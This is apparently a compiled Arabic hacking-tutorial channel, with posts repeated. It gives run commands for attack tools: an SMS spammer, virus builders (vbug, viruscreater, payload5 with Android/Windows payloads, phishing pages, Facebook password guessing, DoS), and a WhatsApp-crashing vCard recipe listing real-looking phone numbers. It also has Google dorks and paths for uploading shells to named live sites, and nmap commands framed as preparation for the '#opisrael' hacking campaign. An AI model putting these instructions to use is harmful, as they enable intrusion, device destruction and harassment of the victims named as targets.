هذه الاداة تقوم بعمل Spider
على الموقع وسحب جميع جميع الكلمات الموجودة به ومن ثم توليد ملف يوجد به جميع الكلمات لا بل أيضاً تقوم بمعرفة الايميلات وأسماء المستخدمين على موقع الهدف بالإضافة إلى تحميل جميع الملفات مثل الأوفيس أو ملفات الـ PDF وقد اثبتت هذه الأداة قدرتها على جمع المعلومات وتم اختراق الكثير من المواقع مثل Wordpress
تثبيت ادة
Goblin word Generator
Installtion :
pkg update
pkg upgrade
pkg install git
pkg install python
pkg install python2
pkg install python3
git clone https://github.com/UndeadSec/GoblinWordGenerator
cd GoblinWordGenerator
chmod +x *
أو
chmod 777 *
python3 goblin.py
على الموقع وسحب جميع جميع الكلمات الموجودة به ومن ثم توليد ملف يوجد به جميع الكلمات لا بل أيضاً تقوم بمعرفة الايميلات وأسماء المستخدمين على موقع الهدف بالإضافة إلى تحميل جميع الملفات مثل الأوفيس أو ملفات الـ PDF وقد اثبتت هذه الأداة قدرتها على جمع المعلومات وتم اختراق الكثير من المواقع مثل Wordpress
تثبيت ادة
Goblin word Generator
Installtion :
pkg update
pkg upgrade
pkg install git
pkg install python
pkg install python2
pkg install python3
git clone https://github.com/UndeadSec/GoblinWordGenerator
cd GoblinWordGenerator
chmod +x *
أو
chmod 777 *
python3 goblin.py
GitHub
GitHub - UndeadSec/GoblinWordGenerator: Python wordlist generator
Python wordlist generator . Contribute to UndeadSec/GoblinWordGenerator development by creating an account on GitHub.
7- اداه portwitness
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
تم تصميم PortWitness كأداة للكشف عن النطاقات النشطة والمجالات الفرعية لمواقع الويب التي تستخدم ميزة فحص المنافذ. يساعد اختبار الاختراق وصائدي الأخطاء في جمع وجمع المعلومات حول النطاقات الفرعية النشطة للمجال الذي يستهدفونه. يقوم PortWitness بتعداد النطاقات الفرعية باستخدام Sublist3r ويستخدم Nmap مع nslookup للبحث عن المواقع النشطة. أخيرًا ، يتم تخزين المجال أو النطاقات الفرعية النشطة في ملف إخراج باستخدام ملف الإخراج هذا ، يمكن للمستخدم بدء اختبار هذه المواقع مباشرة. تم دمج Sublist3r أيضًا مع هذه الوحدة. إنه فعال للغاية ودقيق عندما يتعلق الأمر بمعرفة النطاقات الفرعية النشطة باستخدام Nmap و nslookup. تساعد هذه الأداة أيضًا المستخدم في الحصول على عناوين IP لجميع النطاقات الفرعية والمخازن ، ثم في ملف نصي ، يمكن استخدام عناوين IP هذه لإجراء مزيد من المسح للهدف.
اوامر تثبيتها
git clone https://github.com/viperbluff/PortWitness.git
chmod +x portwitness.sh
bash portwitness.sh الرابط
#CS
GitHub
GitHub - viperbluff/PortWitness: Tool for checking Whether a domain or its multiple sub-domains are up and running.
Tool for checking Whether a domain or its multiple sub-domains are up and running. - viperbluff/PortWitness
اداتي الخاصة باختبار المواقع المصابة بثغرة sqli & upload & RCE من خلال انشاء سكربتات الاستغلال والحقن السريع للمواقع المصابة ب SQLI ايضا تتمكن من خلال الاداة بانشاء INDEX توثيق اختراق بشكل احترافي وجميل دون الحاجة لكتابة الاوامر
رابط الاداة :
git clone https://github.com/profionaldhim/f-injection
رابط شرح الاداة :
https://youtu.be/sfmwLRAottE
يوزر الاداة : profionaldhim
باسورد : Yemen-Hacker445
رابط الاداة :
git clone https://github.com/profionaldhim/f-injection
رابط شرح الاداة :
https://youtu.be/sfmwLRAottE
يوزر الاداة : profionaldhim
باسورد : Yemen-Hacker445
GitHub
GitHub - profionaldhim/f-injection: تقوم هذه الاداة بالحقن السريع للمواقع الالكترونية المصابة بثغرة sqlmap بسهولة جدا وهي تتناسب…
تقوم هذه الاداة بالحقن السريع للمواقع الالكترونية المصابة بثغرة sqlmap بسهولة جدا وهي تتناسب مع المبتدئيين - GitHub - profionaldhim/f-injection: تقوم هذه الاداة بالحقن السريع للمواقع الالكترونية ال...
#الدرس_الثالث
git clone http://github.com/p4kl0nc4t/Spammer-Grab
cd Spammer-Grab
chmod +x auto-install.sh spammer.py
./auto-install.sh
python2 spammer.py --delay 30 حط الرقم والمفتاح من غير
0 او +
مثلا
python2 spammer.py --delay 30 249xxxxxxxxxx
مفتاح السودان 249
بعد ماتثبها وخلاص وحابب تجيبها بسرعة
ls
cd Spammer-Grab
python2 spammer.py --delay 30 249xxxxxxxxxx
#CS
git clone http://github.com/p4kl0nc4t/Spammer-Grab
cd Spammer-Grab
chmod +x auto-install.sh spammer.py
./auto-install.sh
python2 spammer.py --delay 30 حط الرقم والمفتاح من غير
0 او +
مثلا
python2 spammer.py --delay 30 249xxxxxxxxxx
مفتاح السودان 249
بعد ماتثبها وخلاص وحابب تجيبها بسرعة
ls
cd Spammer-Grab
python2 spammer.py --delay 30 249xxxxxxxxxx
#CS
السلام عليكم
أتيت لكم بهذه الاوامر المهمة الخاصة بأداة nmap لاستهداف المواقع وغيرها في اطار شروحاتنا للمبتدئين من أجل عملية #opisrael يوم السابع من هذا الشهر :
1- اوامر ال Nmap لعمل Scan على الهدف
لعمل اسكان ل ip واحد فقط : nmap 192.168.1.1
لعمل اسكان لهوست : nmap www.testhostname.com
لعمل اسكان لمجموعة من الا بى : nmap 192.168.1.1-20
لعمل اسكان على سب نت معين : nmap 192.168.1.0/24
لعمل اسكان من ملف text : nmap -iL list-of-ips.txt
========================================
2 - عمل اسكان على البورتات
سكان بورت واحد فقط : nmap -p 22 192.168.1.1
سكان مجموعة من البورتات : nmap -p 1-100 192.168.1.1
سكان سريع ل 100 مشهورين : nmap -F 192.168.1.1
سكان على 65535 بورت : nmap -p- 192.168.1.1
========================================
3 - فحص نوع البورتات المستخدمة TCP / UDP
سكان عن طريق اتصال من نوع TCP : nmap -sT 192.168.1.1
سكان العادى TCP/Syn : nmap -sS 192.168.1.1
سكان على بورتات ال UDP : nmap -sU -p 123,161,162 192.168.1.1
========================================
4 - الخدمات وتحديد نظام التشغيل
لمعرفة نظام التشغيل والخدمات الشغالة : nmap -A 192.168.1.1
لمعرفة الخدمات الشغالة : nmap -sV 192.168.1.1
لعمل banner grabbing خفيف لكي لايحدث Noise وانت تقوم بالسكان : nmap -sV --version-intensity 0 192.168.1.1
========================================
5 - لاستخراج ملف بالمعلومات التي جمعتها بال Nmap
الامر العادى للحفظ : nmap -oN outputfile.txt 192.168.1.1
لحفظ الملف على شكل XML : nmap -oX outputfile.xml 192.168.1.1
لحفظة بجميع الفورمات الموجودة : nmap -oA outputfile 192.168.1.1
========================================
6 - لمعرفة وجود ثغرة Heartbleed SSL
nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24
========================================
7 - معرفة معلومات اكثر عن ال IP
nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24
========================================
طبعاً اداة ال Nmap اداة قوية في مجال الشبكات او اختبار الاختراق
من يريد التعرف على الاداة اكثر هذه بعض الكتب المفيدة
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
++++
Nmap 6: Network exploration and security auditing Cookbook Paperback – November 23, 20
#حاجه مهمة طبعا ح تجيب نوع المتصفحات بالامر دا طبعا بعد تجيب الايبي
nmap -sV 127.0.0.1/24
تكتب الايبي حق الضحيه طبعا بين ال sV- و ال 24/
#CS
أتيت لكم بهذه الاوامر المهمة الخاصة بأداة nmap لاستهداف المواقع وغيرها في اطار شروحاتنا للمبتدئين من أجل عملية #opisrael يوم السابع من هذا الشهر :
1- اوامر ال Nmap لعمل Scan على الهدف
لعمل اسكان ل ip واحد فقط : nmap 192.168.1.1
لعمل اسكان لهوست : nmap www.testhostname.com
لعمل اسكان لمجموعة من الا بى : nmap 192.168.1.1-20
لعمل اسكان على سب نت معين : nmap 192.168.1.0/24
لعمل اسكان من ملف text : nmap -iL list-of-ips.txt
========================================
2 - عمل اسكان على البورتات
سكان بورت واحد فقط : nmap -p 22 192.168.1.1
سكان مجموعة من البورتات : nmap -p 1-100 192.168.1.1
سكان سريع ل 100 مشهورين : nmap -F 192.168.1.1
سكان على 65535 بورت : nmap -p- 192.168.1.1
========================================
3 - فحص نوع البورتات المستخدمة TCP / UDP
سكان عن طريق اتصال من نوع TCP : nmap -sT 192.168.1.1
سكان العادى TCP/Syn : nmap -sS 192.168.1.1
سكان على بورتات ال UDP : nmap -sU -p 123,161,162 192.168.1.1
========================================
4 - الخدمات وتحديد نظام التشغيل
لمعرفة نظام التشغيل والخدمات الشغالة : nmap -A 192.168.1.1
لمعرفة الخدمات الشغالة : nmap -sV 192.168.1.1
لعمل banner grabbing خفيف لكي لايحدث Noise وانت تقوم بالسكان : nmap -sV --version-intensity 0 192.168.1.1
========================================
5 - لاستخراج ملف بالمعلومات التي جمعتها بال Nmap
الامر العادى للحفظ : nmap -oN outputfile.txt 192.168.1.1
لحفظ الملف على شكل XML : nmap -oX outputfile.xml 192.168.1.1
لحفظة بجميع الفورمات الموجودة : nmap -oA outputfile 192.168.1.1
========================================
6 - لمعرفة وجود ثغرة Heartbleed SSL
nmap -sV -p 443 --script=ssl-heartbleed 192.168.1.0/24
========================================
7 - معرفة معلومات اكثر عن ال IP
nmap --script=asn-query,whois,ip-geolocation-maxmind 192.168.1.0/24
========================================
طبعاً اداة ال Nmap اداة قوية في مجال الشبكات او اختبار الاختراق
من يريد التعرف على الاداة اكثر هذه بعض الكتب المفيدة
Nmap Network Scanning: The Official Nmap Project Guide to Network Discovery and Security Scanning
++++
Nmap 6: Network exploration and security auditing Cookbook Paperback – November 23, 20
#حاجه مهمة طبعا ح تجيب نوع المتصفحات بالامر دا طبعا بعد تجيب الايبي
nmap -sV 127.0.0.1/24
تكتب الايبي حق الضحيه طبعا بين ال sV- و ال 24/
#CS
شرح اليوم هو عن اداة nikto لفحص المواقع من الثغرات والبورتات المفتوحة
اوامر تثبيتها
pkg update
pkg install git
pkg install perl
امر تنصيبها
git clone https://github.com/sullo/nikto
cd nikto
cd program
امر فتح الاداة
perl nikto.pl
امر فحص الموقع المطلوب
perl nikto.pl -h رابط الموقع
بعدها ننتظر حتى يكتمل من الفحص
#CS
اوامر تثبيتها
pkg update
pkg install git
pkg install perl
امر تنصيبها
git clone https://github.com/sullo/nikto
cd nikto
cd program
امر فتح الاداة
perl nikto.pl
امر فحص الموقع المطلوب
perl nikto.pl -h رابط الموقع
بعدها ننتظر حتى يكتمل من الفحص
#CS
GitHub
GitHub - sullo/nikto: Nikto web server scanner
Nikto web server scanner. Contribute to sullo/nikto development by creating an account on GitHub.
#الدرس_التاسع
السلام عليكم ورحمة الله
راح اشرح لكم طريقه عمل فيروس (تعليق) واتس اب
عن طريق تطبيق Quick Edit
هذا وظيفته انشاء فيروس واتس اب من نوع كونتكت vcf
اولا نقوم بفتح التطبيق
نكتب على أول سطر BEGIN:VCARD
و ثاني سطر نحط ال version مثلا VERSION:3.0
أما ثالث سطر والرابع نضع الاسم النحنا بدنا ياه
N: الذيب يقتحم »👹PC👹«الذيب يقتحم
NF:الذيب يقتحم »👹PC👹«الذيب يقتحم
أما في الأسطر الباقيه راح نكرر هذا الي 600 وكل ما زاد عدد الأسطر زادت قوة الفايروس
TEL:+92 301 0880725
TEL;type=HOME;waid=923012762840:+92 301 2762840
TEL:+92 301 3473800
item1.TEL:+92 301 0515416
item1.X-ABLabel:OTHER
TEL:+92 301 0621125
TEL;type=HOME:+92 301 0346216
TEL;type=HOME:+92 301 0510516
item2.TEL;waid=923016460306:+92 301 6460306
item2.X-ABLabel:OTHER
item3.TEL:+92 301 1848084
item3.X-ABLabel:OTHER
TEL;type=HOME:+92 301 3577574
item4.TEL:+92 301 0286016
item4.X-ABLabel:OTHER
TEL:+92 301 5005627
TEL:+92 301 7845010
TEL;waid=923012841806:+92 301 2841806
TEL:+92 301 1684307
TEL;type=HOME;waid=923012827570:+92 301 2827570
item5.TEL:+92 301 7701532
item5.X-ABLabel:OTHER
TEL:+92 301 7186236
TEL:+92 301 5421638
item6.TEL:+92 301 3314888
item6.X-ABLabel:OTHER
TEL;waid=923018442044:+92 301 8442044
TEL;type=HOME:+92 301 4550300
TEL:+92 301 0788813
TEL;waid=923012814480:+92 301 2814480
TEL:+92 301 1285410
TEL;type=HOME:+92 301 2732023
TEL;type=HOME:+92 301 8754235
TEL:+92 301 0503015
item7.TEL:+92 301 8330677
item7.X-ABLabel:OTHER
item8.TEL:+92 301 6217127
item8.X-ABLabel:OTHER
TEL;type=HOME:+92 301 3264214
TEL:+92 301 5654084
TEL;type=HOME;waid=923016022458:+92 301 6022458
TEL;type=HOME:+92 301 5626232
item9.TEL:+92 301 1738823
item9.X-ABLabel:OTHER
TEL;type=HOME:+92 301 5726156
TEL:+92 301 8768875
شرح مقدم من
#CS
السلام عليكم ورحمة الله
راح اشرح لكم طريقه عمل فيروس (تعليق) واتس اب
عن طريق تطبيق Quick Edit
هذا وظيفته انشاء فيروس واتس اب من نوع كونتكت vcf
اولا نقوم بفتح التطبيق
نكتب على أول سطر BEGIN:VCARD
و ثاني سطر نحط ال version مثلا VERSION:3.0
أما ثالث سطر والرابع نضع الاسم النحنا بدنا ياه
N: الذيب يقتحم »👹PC👹«الذيب يقتحم
NF:الذيب يقتحم »👹PC👹«الذيب يقتحم
أما في الأسطر الباقيه راح نكرر هذا الي 600 وكل ما زاد عدد الأسطر زادت قوة الفايروس
TEL:+92 301 0880725
TEL;type=HOME;waid=923012762840:+92 301 2762840
TEL:+92 301 3473800
item1.TEL:+92 301 0515416
item1.X-ABLabel:OTHER
TEL:+92 301 0621125
TEL;type=HOME:+92 301 0346216
TEL;type=HOME:+92 301 0510516
item2.TEL;waid=923016460306:+92 301 6460306
item2.X-ABLabel:OTHER
item3.TEL:+92 301 1848084
item3.X-ABLabel:OTHER
TEL;type=HOME:+92 301 3577574
item4.TEL:+92 301 0286016
item4.X-ABLabel:OTHER
TEL:+92 301 5005627
TEL:+92 301 7845010
TEL;waid=923012841806:+92 301 2841806
TEL:+92 301 1684307
TEL;type=HOME;waid=923012827570:+92 301 2827570
item5.TEL:+92 301 7701532
item5.X-ABLabel:OTHER
TEL:+92 301 7186236
TEL:+92 301 5421638
item6.TEL:+92 301 3314888
item6.X-ABLabel:OTHER
TEL;waid=923018442044:+92 301 8442044
TEL;type=HOME:+92 301 4550300
TEL:+92 301 0788813
TEL;waid=923012814480:+92 301 2814480
TEL:+92 301 1285410
TEL;type=HOME:+92 301 2732023
TEL;type=HOME:+92 301 8754235
TEL:+92 301 0503015
item7.TEL:+92 301 8330677
item7.X-ABLabel:OTHER
item8.TEL:+92 301 6217127
item8.X-ABLabel:OTHER
TEL;type=HOME:+92 301 3264214
TEL:+92 301 5654084
TEL;type=HOME;waid=923016022458:+92 301 6022458
TEL;type=HOME:+92 301 5626232
item9.TEL:+92 301 1738823
item9.X-ABLabel:OTHER
TEL;type=HOME:+92 301 5726156
TEL:+92 301 8768875
شرح مقدم من
#CS
#الدرس_العاشر
السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater
طريقه تثبيتها:::-
الاوامر
1- git clone https://github.com/ERROR4317/viruscreater
2- cd viruscreater
أمر التشغيل
3- python2 virus.py
انا اخترت رقم 2
صناعه فيروسات قويه و ب انواع مختلفه
#CS
السلام عليكم ورحمة الله وبركاته
اليوم سوف اشرح لكم طريقه صنع فايروس قوي
عبر أداة viruscreater
طريقه تثبيتها:::-
الاوامر
1- git clone https://github.com/ERROR4317/viruscreater
2- cd viruscreater
أمر التشغيل
3- python2 virus.py
انا اخترت رقم 2
صناعه فيروسات قويه و ب انواع مختلفه
#CS
GitHub
GitHub - ERROR4317/viruscreater
Contribute to ERROR4317/viruscreater development by creating an account on GitHub.
#الدرس_12
تم تحديث اداه payload5
هذا شرح أداه payload5 (5.9.9)
{رقم 1 تبع الميتاسبلويت فيها}
1 عمل بايلود للاندرويد
2عمل بايلود للويندوز
3 فتح جلسه على بايلود للاندرويد
4 فتح جلسه على بايلود للويندوز
5 اختراق عبر ip من خلال بورت 21
6 اختراق عبر ip من خلال بورت 445
7 فتح الرسائل والمكالمات التي اخذتها من الضحيه
8 فتح الصور والملفات الذي اخذتها من الضحيا
9 تحميل الميتاسبلويت
10 حل مشاكل الميتاسبلويت
11 تحميل الميتاسبلويت آخر إصدار 5.0.0
-------------------------------
{رقم 2 تبع الفحص}
1 فحص ip أو رابط موقع
2 إظهار جميع ip الاجهزه على الشبكه
3 لفحص ip عشوائي
4 لتحميل الاده nmap
-------------------------------
{رقم 3 تبع الهجوم(الدوس اتاك)}
1للهجوم على موقع
-------------------------------
{رقم 4تبع ngrok}
1 فتح http من النجرج
2 فتح tcp من النجرج
3 تحميل النجرج يجب الدخول للموقع لاحدار الكود
-------------------------------
{رقم5 تبع الفيروسات}
1 عمل فيروس عادي
2 عمل فيروس يشبه الفيس بوك
3-عمل فيروس شبه WhatsApp
4-عمل فيروس شبه الانستجرام
5-عمل فيروس شبه الماسنجر
6 فيروس إرسال رسائل مزعجه SMS لأي
شخص ببلاش
7 إرسال مكالمات مزعجه لأي أحد مجانيه
8-رفع الفيروس لكي تبعتو للضحيه
-------------------------------
{رقم 6 تبع Termux}
1 لتغير ثيم Termux باسمك
2 تحميل جميع الأدوات الاساسيه
3 لتغير ثيم ترميكس إلى ثيم الجمجمة
4 لتغير ثيم ترميكس إلى ثيم جمجمتين
-------------------------------
{رقم 7 تبع الفيس بك}
1 التخمين على باسورد الفيس بوك
2 اختراق متاح وفيسبوك عشوائي
3صنع صفحه مزوره للفيس بوك
---------------------------
{رقم 8 للتشفير }
1- تشفير ملف بايثن 1
2- تشفير ملف بايثن 2
--------------------------
30 لفتح حسابي الفيس بوك
--------------------------
40 لفتح قناتي YouTube
--------------------------
7777 لتفريغ مساحه في الهاتف
--------------------------
90 help
للتحديث قم بكتابه 99
تثبيت اداة Payload 5
pkg install git -y
git clone https://github.com/Ali898989/setupp
cd setupp
chmod +x setup.sh
./setup.sh
cd payload5
#CS
تم تحديث اداه payload5
هذا شرح أداه payload5 (5.9.9)
{رقم 1 تبع الميتاسبلويت فيها}
1 عمل بايلود للاندرويد
2عمل بايلود للويندوز
3 فتح جلسه على بايلود للاندرويد
4 فتح جلسه على بايلود للويندوز
5 اختراق عبر ip من خلال بورت 21
6 اختراق عبر ip من خلال بورت 445
7 فتح الرسائل والمكالمات التي اخذتها من الضحيه
8 فتح الصور والملفات الذي اخذتها من الضحيا
9 تحميل الميتاسبلويت
10 حل مشاكل الميتاسبلويت
11 تحميل الميتاسبلويت آخر إصدار 5.0.0
-------------------------------
{رقم 2 تبع الفحص}
1 فحص ip أو رابط موقع
2 إظهار جميع ip الاجهزه على الشبكه
3 لفحص ip عشوائي
4 لتحميل الاده nmap
-------------------------------
{رقم 3 تبع الهجوم(الدوس اتاك)}
1للهجوم على موقع
-------------------------------
{رقم 4تبع ngrok}
1 فتح http من النجرج
2 فتح tcp من النجرج
3 تحميل النجرج يجب الدخول للموقع لاحدار الكود
-------------------------------
{رقم5 تبع الفيروسات}
1 عمل فيروس عادي
2 عمل فيروس يشبه الفيس بوك
3-عمل فيروس شبه WhatsApp
4-عمل فيروس شبه الانستجرام
5-عمل فيروس شبه الماسنجر
6 فيروس إرسال رسائل مزعجه SMS لأي
شخص ببلاش
7 إرسال مكالمات مزعجه لأي أحد مجانيه
8-رفع الفيروس لكي تبعتو للضحيه
-------------------------------
{رقم 6 تبع Termux}
1 لتغير ثيم Termux باسمك
2 تحميل جميع الأدوات الاساسيه
3 لتغير ثيم ترميكس إلى ثيم الجمجمة
4 لتغير ثيم ترميكس إلى ثيم جمجمتين
-------------------------------
{رقم 7 تبع الفيس بك}
1 التخمين على باسورد الفيس بوك
2 اختراق متاح وفيسبوك عشوائي
3صنع صفحه مزوره للفيس بوك
---------------------------
{رقم 8 للتشفير }
1- تشفير ملف بايثن 1
2- تشفير ملف بايثن 2
--------------------------
30 لفتح حسابي الفيس بوك
--------------------------
40 لفتح قناتي YouTube
--------------------------
7777 لتفريغ مساحه في الهاتف
--------------------------
90 help
للتحديث قم بكتابه 99
تثبيت اداة Payload 5
pkg install git -y
git clone https://github.com/Ali898989/setupp
cd setupp
chmod +x setup.sh
./setup.sh
cd payload5
#CS
GitHub
GitHub - Ali898989/setupp
Contribute to Ali898989/setupp development by creating an account on GitHub.
#الدرس_13
شرحي اليوم عن اداة vbug و هي طريقة سهلة لعمل فايروس مدمر للاجهزة
اول انا غير مسؤل تماما عن طريقة استخدامك لهذه الاداة
git clone https://github.com/Junior60/vbug
CD vbug
ls
chmod +x vbug
python2 vbug.py
كدا الاداة بتفتح معاك تقوم تختار رقم الذي يقابل نوع الجغهز اللي اتا عايز الفايروس من اجله بعداك نوع الفايروس e لاطبيقات ال apk بعداك
ls
بتلقا الفايروس مع ملفات الاداة
بعداك تدي
cp اسم الفيروس /sdcard
عشان تنقله لزاكرة الجهاز طبعا لسا بكون في نسخة من الفايروس في ملفات الاداة تدي الامر
rm -rf اسم الفايورس
لمسحه
يلا الفايروس دا لو اديتو لي زول مجرد ما يعمل ليه تثبيت عليه العوض
الشرح مقدم من
#CS
شرحي اليوم عن اداة vbug و هي طريقة سهلة لعمل فايروس مدمر للاجهزة
اول انا غير مسؤل تماما عن طريقة استخدامك لهذه الاداة
git clone https://github.com/Junior60/vbug
CD vbug
ls
chmod +x vbug
python2 vbug.py
كدا الاداة بتفتح معاك تقوم تختار رقم الذي يقابل نوع الجغهز اللي اتا عايز الفايروس من اجله بعداك نوع الفايروس e لاطبيقات ال apk بعداك
ls
بتلقا الفايروس مع ملفات الاداة
بعداك تدي
cp اسم الفيروس /sdcard
عشان تنقله لزاكرة الجهاز طبعا لسا بكون في نسخة من الفايروس في ملفات الاداة تدي الامر
rm -rf اسم الفايورس
لمسحه
يلا الفايروس دا لو اديتو لي زول مجرد ما يعمل ليه تثبيت عليه العوض
الشرح مقدم من
#CS
GitHub
GitHub - Junior60/vbug
Contribute to Junior60/vbug development by creating an account on GitHub.
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
#CS
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp...load/test.html
وهذا ايضا
http://celiaflores.net/wp-content/pl...load/test.html
==========================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
==========================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
==========================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
==========================================
الدورك
: inurllugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
#CS
احبائي واصدقائي الاعضاء الكرام
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif
#CS
ثغرات ابلود ترفع شيل بصيغة صورة
وتكدر من خلال اضافة فايرفوكس لتحويل الصيغ
أكيد تعرفوها Live HTTP headers
ومكان نزول الشيل عليكم لين مدورت الصراحة
http://www.samysoft.net/fmm/fimnew/fwasel/1/101232.gif
الدورك
inurl:wp-content/plugins/monsters-editor-10-for-wp-super-edit
الاستغلال
wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html
مثال موقع
http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://kybloodcenter.org/hospital/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
وهذا ايضا
http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html (http://celiaflores.net/wp-content/plugins/monsters-editor-10-for-wp-super-edit/mse/fckeditor/editor/filemanager/upload/test.html)
============================================
الدورك
inurl:/js/tiny_mce/plugins/tinybrowser/upload.php
الاستغلال
admin/js/tiny_mce/plugins/tinybrowser/upload.php
مسار الشيل
uploads/imagens/
============================================
الدورك
inurl:"wp-content/plugins/chenpress"
الاستغلال
wp-content/plugins/chenpress/FCKeditor/editor/filemanager/browser/mcpuk/browser.html
============================================
الدورك
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
===========================================
الدورك
: inurl:"wp-content/plugins/wp-insert"
الاستغلال
/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
واحيانا قبل الاستغلال هذا الملف blog
/blog/wp-content/plugins/wp-insert/fckeditor/editor/filemanager/browser/default/browser.html
============================================
الدورك
: inurl:plugins/flexiweb-form/
الاستغلال
/wp-content/plugins/flexiweb-form/ajax/upload_img.php
============================================
http://i32.servimg.com/u/f32/12/32/61/62/74539610.gif
http://www.samysoft.net/fmm/fimnew/nehaya/99087634.gif
#CS
intext:"Web Development by IES, Inc"
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
الاستغلال
/fckeditor/editor/filemanager/browser/default/browser.html
ثغرة Local File Include
بسم الله الرحمن الرحيم
اخواني الكرام
السلام عليكم و رحمة الله وبركاته
الموضوع عن ثغرات:Local File Include بظن أغلبكم بيعرفها
